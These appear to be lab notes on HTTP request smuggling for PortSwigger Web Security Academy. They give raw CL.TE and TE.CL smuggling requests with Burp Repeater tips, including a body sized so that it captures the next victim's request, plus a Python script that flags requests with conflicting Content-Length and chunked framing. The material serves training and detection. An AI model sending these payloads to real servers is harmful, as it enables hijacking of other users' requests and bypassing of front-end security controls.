HTTP Request Smuggling
Bypass, XSS and more
CL.TE
POST / HTTP/1.1
Host: 0aa9006c0356f4eac12f806b00d70072.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: x

Note: Content-Length is auto-computed by Burp (in orange).
TE.CL
POST / HTTP/1.1
Host: 0a2c00bb04e22568c172dfbe00ba003d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

9e
GET /404 HTTP/1.1
Host: 0a2c00bb04e22568c172dfbe00ba003d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

x=
0


There are two line breaks (Enter) after the final 0!

Note the two line breaks ending on line 16, which terminate the chunked request. Disable Content-Length computation in Burp Repeater settings.
The first Content-Length is 4 bytes, just enough to cover the chunk-size line (line 7); the chunk size itself is computed from the orange part.
The second Content-Length is set slightly above what its own data requires, so that it overrides the next incoming request (the victim's).
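The byte counts above can be checked mechanically. The following is an added example, not part of the original notes: it delimits the same request once by Content-Length and once by chunked encoding and reports the bytes each reading leaves over, which is the check a front end or log pipeline can use to flag requests carrying both headers. The names chunked_end and framing are hypothetical.

```python
# Added example: compare how a Content-Length parser and a chunked parser
# delimit the same request body, and report the bytes each leaves over.
def chunked_end(body: bytes) -> int:
    """Offset just past the terminating 0-size chunk and its trailer section."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            while body[pos:pos + 2] != b"\r\n":       # skip trailer fields
                pos = body.index(b"\r\n", pos) + 2
            return pos + 2
        pos += size + 2                               # chunk data + CRLF

def framing(raw: bytes) -> dict:
    head, _, body = raw.partition(b"\r\n\r\n")
    hdr = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        hdr[name.strip().lower()] = value.strip()
    chunked = b"chunked" in hdr.get(b"transfer-encoding", b"").lower()
    if not (chunked and b"content-length" in hdr):
        return {"ambiguous": False}
    cl_end, te_end = int(hdr[b"content-length"]), chunked_end(body)
    return {"ambiguous": cl_end != te_end,
            "left_after_cl": body[cl_end:],   # bytes a CL parser sees as the next request
            "left_after_te": body[te_end:]}   # bytes a TE parser sees as the next request

# Sample input: the two requests from this page, rebuilt with explicit CRLFs
# (one lab host reused for both; the Host value does not affect framing).
HOST = b"0a2c00bb04e22568c172dfbe00ba003d.web-security-academy.net"
HEAD = (b"POST / HTTP/1.1\r\nHost: " + HOST + b"\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n")
CL_TE = (HEAD + b"Content-Length: 35\r\nTransfer-Encoding: chunked\r\n\r\n"
         b"0\r\n\r\nGET /404 HTTP/1.1\r\nX-Ignore: x")
INNER = (b"GET /404 HTTP/1.1\r\nHost: " + HOST + b"\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 144\r\n\r\nx=")
TE_CL = (HEAD + b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n"
         b"9e\r\n" + INNER + b"\r\n0\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("CL.TE", CL_TE), ("TE.CL", TE_CL)):
        print(name, framing(req))
```

A non-empty left_after_cl or left_after_te is the part of the message that one of the two parsers would treat as the start of a separate request.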
TE.0 PoC